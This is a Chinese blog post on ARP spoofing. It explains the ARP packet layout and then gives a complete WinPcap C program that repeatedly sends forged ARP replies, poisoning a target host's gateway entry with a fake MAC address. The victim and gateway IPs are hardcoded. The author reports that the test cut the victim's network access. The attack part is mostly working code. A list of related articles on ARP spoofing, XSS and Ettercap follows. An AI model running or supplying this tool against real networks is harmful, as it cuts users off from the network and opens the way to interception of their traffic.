初探ARP攻击

最新推荐文章于 2025-03-18 20:00:28 发布
原创 最新推荐文章于 2025-03-18 20:00:28 发布 · 1.2k 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#header #buffer #dst #浏览器 #list #null

    学校里是局域网,而且过上十天半个月就会有ARP攻击泛滥。最一开始并不知道什么是ARP,知道ARP后还是不知道什么是ARP攻击。今天看了一个教程,了解了常规的ARP攻击的的方法。从协议报文外看其实就是发送修改后的报文使目的机器找不到上网的连接,局域网大都是通过网关上网的,IP不是唯一的,但MAC网卡地址是全球唯一的,所以把目的地址的ARP缓存中的网关的MAC地址修改成错误的MAC地址,目的机器就找不到网关也就不能上网了。

    掌握各种协议报文很有必要,但在这里大概提一下ARP协议报文结构:

    一个完整的ARP报文由三部分组成:ARP头 物理帧和ARP帧。

   物理帧由:接收方MAC(6bytes),发送方MAC(6bytes)和以太网类型(0x0806)

   ARP帖由:硬件类型,上层协议类型(2),MAC地址长度(2),IP地址长度(1),操作码(2),

                    发方MAC(6),发方端口(4),收方MAC(6),收方端口(4),填充数据(18)

  

   此程序用到了WinpCap软件源库packet.lib和头文件packet32.h,调用了一些方法可以直接从网卡里读取数据报文。

  1. #include "winsock2.h"
  2. #include "Packet32.h"
  3. #include "stdio.h"
  4. #include "Iphlpapi.h"
  6. #pragma comment(lib, "packet.lib")
  7. #pragma comment(lib, "ws2_32.lib")
  8. #pragma comment(lib,"iphlpapi.lib")
  11. #define NDIS_PACKET_TYPE_DIRECTED 0x0001 //直接模式
  13. #pragma pack(push, 1)
  15. //以太网物理帧头部
  16. typedef struct _et_header    
  17. {
  18.     unsigned char   eh_dst[6];  
  19.     unsigned char   eh_src[6];
  20.     unsigned short  eh_type;
  21. }ET_HEADER;
  23. //ARP帧头部
  24. typedef struct _arp_header   
  25. {
  26.     unsigned short  arp_hdr;
  27.     unsigned short  arp_pro;
  28.     unsigned char   arp_hln;
  29.     unsigned char   arp_pln;
  30.     unsigned short  arp_opt;
  31.     unsigned char   arp_sha[6];
  32.     unsigned long   arp_spa;
  33.     unsigned char   arp_tha[6];
  34.     unsigned long   arp_tpa;
  35. }ARP_HEADER;
  37. //将被传递到监听线程的信息结构
  38. typedef struct info     
  39. {
  40.     LPADAPTER   lpAdapter;
  41.     char        localIP[20];
  42.     char        simulateIP[20];
  43.     char        targetIP[20];
  44. }INFO;
  46. // 网卡信息
  47. typedef struct tagAdapterInfo          
  48. {
  49.       char  szDeviceName[128];           // 名字
  50.       char  szIPAddrStr[16];             // IP
  51.       char  szHWAddrStr[18];             // MAC
  52.       DWORD dwIndex;                    // 编号          
  53. }INFO_ADAPTER, *PINFO_ADAPTER;
  54. //
  55. INFO_ADAPTER infoAdapterList[10];
  57. #pragma pack(pop)
  59. //IP报头部
  60. typedef struct _ip_header
  61. {
  62.     unsigned char   h_verlen;   //4位IP版本号+4位首部长度
  63.     unsigned char   tos;        //8位服务类型TOS
  64.     unsigned short  total_len;  //16位总长度(字节)
  65.     unsigned short  ident;      //16位标识
  66.     unsigned short  frag_and_flags; //3位标志位+13位分段偏移量
  67.     unsigned char   ttl;        //8位生存时间 TTL
  68.     unsigned char   proto;      //8位协议 (TCP, UDP 或其他)
  69.     unsigned short  checksum;   //16位IP首部校验和
  70.     unsigned int    sourceIP;   //32位源IP地址
  71.     unsigned int    destIP;     //32位目的IP地址
  72. }IP_HEADER;
  74. void usage()
  75. {
  76.     printf("Name : Richard/r/n");
  77.     printf("MSN  : hdqu@hotmail.com/r/n");
  78.     printf("Usage: ARPSender targetIP simuIP fakeMAC/r/n/r/n");
  79. }
  81. int GetLocalAdapterList()
  82. {
  83.     char                tempChar;
  84.     ULONG               uListSize=1;
  85.     PIP_ADAPTER_INFO    pAdapter;           // 定义PIP_ADAPTER_INFO结构存储网卡信息
  86.     int                 nAdapterIndex = 0;
  87.     
  88.     //获得网卡列表信息串长度
  89.     DWORD   dwRet = GetAdaptersInfo((PIP_ADAPTER_INFO)&tempChar, &uListSize);
  90.     printf("/r/nTry to get adapter list.../r/n");
  91.     if (dwRet == ERROR_BUFFER_OVERFLOW)
  92.     {
  93.         PIP_ADAPTER_INFO pAdapterListBuffer = (PIP_ADAPTER_INFO) new (char[uListSize]);
  94.         dwRet = GetAdaptersInfo(pAdapterListBuffer, &uListSize);
  95.         if (dwRet == ERROR_SUCCESS)
  96.         {
  97.             pAdapter = pAdapterListBuffer;
  98.             // 枚举网卡然后将相关条目添加到List中
  99.             while (pAdapter)      
  100.             {
  101.                 // 网卡名字
  102.                 char strTemp[128];
  103.                 strcpy(strTemp, "//Device//NPF_");                     
  104.                 strcat(strTemp, pAdapter->AdapterName);                        // 加上前缀              
  105.                 strcpy(infoAdapterList[nAdapterIndex].szDeviceName,strTemp);
  106.                 // IP
  107.                 strcpy(infoAdapterList[nAdapterIndex].szIPAddrStr,pAdapter->IpAddressList.IpAddress.String );
  108.                 // MAC
  109.                 sprintf( infoAdapterList[nAdapterIndex].szHWAddrStr, "%02x%02x%02x%02x%02x%02x", /
  110.                     pAdapter->Address[0],pAdapter->Address[1],pAdapter->Address[2], /
  111.                    pAdapter->Address[3],pAdapter->Address[4],pAdapter->Address[5]);
  112.                 // 网卡编号
  113.                 infoAdapterList[nAdapterIndex].dwIndex = pAdapter->Index;          
  114.                 pAdapter = pAdapter->Next;
  115.                 nAdapterIndex ++;
  116.             }
  117.             delete pAdapterListBuffer;
  118.         }
  119.         return nAdapterIndex;
  120.     }
  121.     return 0;
  122. }
  124. void StrToMac(char *str,unsigned char *mac)  //自定义的将字符串转换成mac地址的函数
  125. {
  126.     char *str1;
  127.     int i;
  128.     int low,high;
  129.     char temp;
  131.     for(i=0;i<6;i++)
  132.     {
  133.         str1=str+1;
  134.         switch(*str)
  135.         {
  136.         case 'a':high=10;
  137.             break;
  138.         case 'b':high=11;
  139.             break;
  140.             case 'c':high=12;
  141.             break;
  142.             case 'd':high=13;
  143.             break;
  144.         case 'e':high=14;
  145.             break;
  146.         case 'f':high=15;
  147.             break;
  148.         default:temp=*str;
  149.            high=atoi(&temp);
  150.         }
  151.         switch(*str1)
  152.         {
  153.         case 'a':low=10;
  154.             break;
  155.         case 'b':low=11;
  156.             break;
  157.             case 'c':low=12;
  158.             break;
  159.             case 'd':low=13;
  160.             break;
  161.         case 'e':low=14;
  162.             break;
  163.         case 'f':low=15;
  164.             break;
  165.         default:temp=*str1;
  166.            low=atoi(&temp); 
  167.         }
  168.         mac[i]=high*16+low;
  169.         str+=2;
  170.     }
  171. }
  173. bool GetRemoteMac(unsigned char *remoteMac,char *remoteIP)            //获取远程主机MAC地址
  174. {
  175.     WSADATA wsaData;
  176.     ULONG remoteAddr=0,macAddrLen=6;
  177.     unsigned char remoteMacTemp[6]={0}; 
  179.     if(WSAStartup(MAKEWORD(2,1), &wsaData)!=0)
  180.     {
  181.         printf("WSAStartup error!/n");
  182.         return FALSE;
  183.     }
  185.     remoteAddr=inet_addr(remoteIP);
  186.     if(SendARP(remoteAddr, (unsigned long)NULL,(PULONG)&remoteMacTemp, &macAddrLen)!=NO_ERROR)
  187.     {
  188.         printf("Get remote MAC failed!/n");
  189.         return FALSE;
  190.     }
  191.     memcpy(remoteMac,remoteMacTemp,6);
  192.     
  194.     printf("Remote IP: %s   MAC: ", remoteIP);
  195.     for(int i=0; i<6; i++ )
  196.     {
  197.         printf( "%.2x", remoteMac[i] );
  198.     }
  199.     printf("/r/n");
  201.     return TRUE;
  202. }
  205. int main(int argc, char* argv[])
  206. {
  207.     LPADAPTER       lpAdapter;
  208.     LPPACKET        lpPacket;
  209.     ET_HEADER       et_header;
  210.     ARP_HEADER      arp_header;
  211.     char            buffer[512]={0};
  212.     INFO            param={0};
  213.     int             index = 0;
  214.     int             adaptercount = 0;
  216.     usage();
  218.     /*if(argc != 4)
  219.     {
  220.         return -1;
  221.     }*/
  223.     unsigned char remoteMac[6] = {0};
  224.     unsigned char fakeMac[6]   = {0};
  226.     //获取目标真实MAC地址
  227.     if(GetRemoteMac(remoteMac, "10.1.16.103"/*argv[1]*/) == FALSE)
  228.     {
  229.         return -1;
  230.     }
  231.     
  232.     //获得适配器列表
  233.     adaptercount = GetLocalAdapterList();
  234.     
  235.     //通过转换得到用户输入的虚假MAC地址
  236.     StrToMac(/*argv[3]*/"222222222222", fakeMac);
  237.     
  238.     for(int i = 0; i< adaptercount; i++)
  239.         printf("%d: %s: %s/n/n",i,infoAdapterList[i].szIPAddrStr,infoAdapterList[i].szDeviceName);
  240.     
  241.     printf("Select a working adapter by number:");
  243.     while(TRUE)
  244.     {
  245.         scanf("%d",&index);
  246.         if(index >= 0 && index < adaptercount) break;
  247.     }
  249.     //打开适配器
  250.     lpAdapter=(LPADAPTER)PacketOpenAdapter((LPTSTR)infoAdapterList[index].szDeviceName); 
  253.     if (!lpAdapter||(lpAdapter->hFile==INVALID_HANDLE_VALUE))
  254.     {
  255.         printf("Unable to open the driver, Error Code : %lx/n", GetLastError());
  256.         return -1;
  257.     } 
  259.     //伪造ARP应答包
  260.     memcpy(et_header.eh_src, fakeMac,   6);
  261.     memcpy(et_header.eh_dst, remoteMac, 6);
  263.     et_header.eh_type=htons(0x0806);  //类型为0x0806表示这是ARP包
  265.     arp_header.arp_hdr=htons(0x0001);  //硬件地址类型以太网地址
  266.     arp_header.arp_pro=htons(0x0800);  //协议地址类型为IP协议
  267.     arp_header.arp_hln=0x06;           //硬件地址长度为6
  268.     arp_header.arp_pln=0x04;           //协议地址长度为4
  269.     arp_header.arp_opt=htons(0x0002);  //标识为ARP应答
  271.     arp_header.arp_spa=inet_addr(/*argv[2]*/"10.1.19.254");  //source_ip
  272.     memcpy(arp_header.arp_sha,et_header.eh_src,6);
  273.     arp_header.arp_tpa=inet_addr(/*argv[1]*/"10.1.16.103");  //target_ip
  274.     memcpy(arp_header.arp_tha,et_header.eh_dst,6);
  276.     memcpy(buffer,&et_header,sizeof(ET_HEADER));
  277.     memcpy(buffer+sizeof(ET_HEADER),&arp_header,sizeof(ARP_HEADER));
  279.     //给PACKET结构指针分配内存
  280.     lpPacket=PacketAllocatePacket();     
  282.     //初始化PACKET结构指针
  283.     PacketInitPacket(lpPacket,buffer,64);   
  284.             
  285.     //设置发送次数
  286.     if(PacketSetNumWrites(lpAdapter, 2) == FALSE)   
  287.     {
  288.         printf("warning: Unable to send more than one packet in a single write!/n");
  289.     }
  291.     //不断发送伪造的ARP应答包欺骗目标主机
  292.     while(TRUE)
  293.     {
  294.         struct in_addr sAddr, tAddr;
  295.         sAddr.S_un.S_addr = arp_header.arp_spa;
  296.         tAddr.S_un.S_addr = arp_header.arp_tpa;
  298.         printf("send fake %s:%02x-%02x-%02x-%02x-%02x-%02x ", /
  299.             inet_ntoa(sAddr), /
  300.             fakeMac[0], fakeMac[1], fakeMac[2], fakeMac[3], fakeMac[4], fakeMac[5]);
  301.         printf("to %s:%02x-%02x-%02x-%02x-%02x-%02x/r/n"
  302.             inet_ntoa(tAddr), /
  303.             remoteMac[0], remoteMac[1], remoteMac[2], remoteMac[3], remoteMac[4], remoteMac[5]);
  304.         if(PacketSendPacket(lpAdapter,lpPacket,TRUE) == FALSE) 
  305.         {
  306.             printf("Error sending the packets!/n");
  307.             break;
  308.         }
  309.         Sleep(2000);
  310.     }
  312.     PacketFreePacket(lpPacket);   //释放PACKET结构指针
  314.     PacketCloseAdapter(lpAdapter);  //关闭适配器
  316.     return 0;
  317. }

   程序攻击本地机器使用cmd-->arp -a 查看 10.1.19.254对应的MAC的地址改成了自定义的22-22-22-22-22-22,打开浏览器输入网址打不开链接,但刷新ARP缓存时我看到有时10.1.19.254对应的MAC地址会改成正确的,应该是网关一直在广播ARP报文,而本地程序具有一定的时间延迟,所以造成网络有时可以缓慢的打开一些网页。

[网络安全自学篇] 七十八.XSS跨站脚本攻击案例分享及总结(二)
杨秀璋的专栏
05-18 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了肖老师(Seak)的分享,介绍恶意代码与APT攻击中的武器,包括A2PT的攻击武器、普通APT组织的自研恶意代码、商用恶意代码、无恶意代码作业、开源和免费工具等。这些天分享了很多系统安全和软件安全的知识,接下来让我们回归网络安全,做做XSS跨站脚本攻击案例。这些题目来自Fox好友,在此感谢他。主要内容包括XSS原理、不同类型的XSS、XSS靶场9道题目、如何防御XSS。希望您喜欢~
[网络安全自学篇] 二十五.Web安全学习路线及木马、病毒和防御初探
热门推荐
杨秀璋的专栏
11-12 3万+
这是作者的系列网络安全自学教程,主要是关于网安工具和实践操作的在线笔记,特分享出来与博友共勉,希望您们喜欢,一起进步。前文分享了分享机器学习在安全领域的应用,并复现一个基于机器学习(逻辑回归)的恶意请求识别。这篇文章简单叙述了Web安全学习路线,并实现了最简单的木马和病毒代码,希望对读者有所帮助。
基于winpcap的mfc arp欺骗
11-04
相比于之前的arp欺骗程序 修正了程序堆栈溢出的问题,添加了winpcap开发库,自动获取往电脑设置的网关(只需修改适配器名称),并且可以在网卡列表选择指定网卡发送数据包
基于MFC的ARP发送
03-29
应用WIncap对ARP包进行封装,发送
ARP攻击模拟工具 第一代
10-13
实现模拟以太网的ARP欺骗攻击和IP地址冲突攻击。 此为本人早期作品,固比较简陋和不完善,漏洞及错误之处可能较多请多多包涵! 开发环境为vs2005 + winpcap 4.0.2 编译需要导入winpcap 4.0.2 lib库 使用之前需安装winpcap4.0.2驱动 包含程序及源码
ARP攻击及实现详解
mxway的专栏
03-26 9245
声明:本文只用于技术交流和学习使用,严禁用于任何其它用途,严禁转载。若因本文带来的任何麻烦,本人不承担任何连带责任。 一、ARP协议 关于arp协议作用就不再这里多说了,直接看下图 图1 上图来源于TCP-IP协议详解卷1的图4-3 图1中以太网目的地址,以太网源地址,发送端以太地址,发送端IP地址,目的以太网地址,目的IP地址这几个字段的含义很明显。主要看剩下几个字段的取值用途是什
ARP网关欺骗原理及解决办法
小米的修行之路
06-24 1万+
一.什么是ARP协议? ARP协议是“Address Resolution Protocol”(地址解析协议)的缩写。在局域网中,网络中实际传输的是“帧”,帧里面是有目标主机的MAC地址的。在以太网中,一个主机要和另一个主机进行直接通信,必须要知道目标主机的MAC地址。但这个目标主机的MAC地址是如何获得的呢?它就是通过地址解析协议获得的。所谓“地址解析”就是主机在发送帧前将目标IP地址转换成目标...
ARP攻击初探
xiaobai的博客
04-16 284
@ARP攻击初探 第一步思路 1.攻击指定的IP实现断网——ARP 2.原理:通过扫描当前攻击机的IP地址,得到内网的所有IP所在网关 3.组成ARP数据包,对网关内的主机先发起ping,寻找到存活的主机 4.获得存活主机列表,选择需要攻击的ip,发起攻击 步骤 获得当前的IP及网关route print 封装ARP数据包,以太网的包结构形式来发起ping,得到存活主机列表 得到存活主机列表 选...
4.4--入门知识扫盲,初探ARP报文协议和ICMP报文协议(包你看一遍全部记住)
最新发布
2302_77698668的博客
03-18 654
介绍了ICMP报文和ARP在OSI二层数据链路层的作用与工作原理,丰富的图表确保你可以很快上手
初探 Ettercap: ARP投毒 && DNS欺骗
梦想专栏
08-05 4021
笔记一:ettercap是什么? 我们在对WEB安全检测的时候都会用到Cain和netfuke这两款工具,功能相信用过的朋友多多少少都知道,但这两款工具是在windows下运行的。 而ettercap是在linux下运行的 。其实功能都是差不多的,我称呼它为嗅探工具,ARP欺骗,DNS,劫持,中间人攻击等等。总之这是一款强大的安全测试工具。 笔记二:DNS简单说明 了解DNS是什么:Dom...
Dennis的ARP初探第三篇--再谈ARP攻击时,面对的不仅是技术
weixin_34203426的博客
11-07 89
前日,在培训课堂上,当讲师谈起ARP攻击的时候,很多学员都非常的兴奋,纷纷询问如何解决,有什么样的技术解决是最好的。 当然了,提出的方法很多,病毒查杀,交换机上做设置等等。 当然了,在我看来,这些技术是非常的好了。抓包啊,设置啊什么的,我是不会了。 而我关注的是:在结局问题的时候,是应该显示自己的技术高超呢,还是迅速的解决问题呢? 这里,应该有人会想,肯...
《网络安全技术》实验教学改革初探.docx
01-21
1. **ARP欺骗实验**:通过构造ARP欺骗报文,实现中间人攻击,模拟网络嗅探过程,从而破坏数据传输的保密性。 2. **攻击防范方案**:从不同角度出发,设计防范ARP欺骗攻击的方法,如静态绑定ARP缓存、配置HTTPS实现...
[网络安全自学篇] 七十七.恶意代码与APT攻击中的武器
杨秀璋的专栏
05-14 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了逆向分析之OllyDbg动态调试工具,包括INT3断点、反调试、硬件断点和内存断点。这篇文章将带大家学习安天科技集团首席架构师肖新光老师(Seak)的分享,介绍恶意代码与APT攻击中的武器,包括A2PT的攻击武器、普通APT组织的自研恶意代码、商用恶意代码、无恶意代码作业、开源和免费工具等。作者很少会在标题写“强推”的字样,但这篇文章真的值得学习,也希望对您有所帮助。
【WinPcap】自制抓包+分析+ARP攻击(三)
猫和鱼爪的鸟窝
04-23 3835
【WinPcap】自制抓包+分析+ARP攻击 扫描网内主机       继续接着昨天的来,今天就能搞定。           先来看一下对网内活动主机的扫描。我的大体思路是:对网段内所有IP发送ARP包,根据收到的响应来判断是否有活动主机,并作记录。这一点其实不难,仔细认真地遍历网段内主机IP,用一个线程额外接受ARPreply响应包,并做解析就可以了。我觉得难就难在网关的确定,子网掩码
【WinPcap】自制抓包+分析+ARP攻击(二)
猫和鱼爪的鸟窝
04-22 1590
【WinPcap】自制抓包+分析+ARP攻击 接着上次说的,在看完TCP/IP各种协议的结构之后,我就打算做简单的第一步:打开网卡。 打开网卡 这一步从WinPcap给出的第一个实例中就可以得到。 先获取网卡链表,用到的函数: int pcap_findalldevs_ex ( char * source, //PCAP_SRC_IF_STRING struct pc
基于ARP的局域网IP劫持——C语言实现
多媒体编程、网络编程、系统编程、网络安全编程、驱动编程
08-08 3089
150 printf("success: device: %s\n", devStr); 151 } 152 else 153 { 154 printf("error: %s\n", errBuf); 155 exit(1); 156 } 157 158 /* open a device, wait until a packet arrives *
使用ICMP协议绕过防火墙拦截
三两四钱
01-02 5818
    通常防火墙默认是允许用户使用Ping一个网络地址的,而我们知道Ping的过程其实是发送和接收ICMP报文的过程。我们看一下ICMP报文结构:                   ICMP 8  |  代码 8                    校    验    和    16                  标    识    符    16          
文件分割和合并多线程实现
三两四钱
01-02 4314
     用途:像一些安装程序经常会用到的是把一个很大的文件切割成较小的文件,安装的时候从每个小的文件块中读取内容。还有一些网络下载工具像快车等一般是通过多线程对同一个文件进行下载,就是对同一文件进行分块下载,然后将本地的文件块合并就可以得到最终的文件,提高了效率。    其实文件分割和合并的方法就是自定义的一个数据结构,通过数据结构获得文件信息以进行操作。在这里我们整体过程是这样的:  
基于浏览器的Cryptojacking攻击初探研究
标题《cryptojacking-first-paper:基于浏览器的Cryptojacking初探》明确指出,这是一篇关于浏览器端Cryptojacking现象的早期研究论文,具有开创性意义。作为“第一篇”系统性探讨此类攻击的文献,它很可能从攻击...
评论 1
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值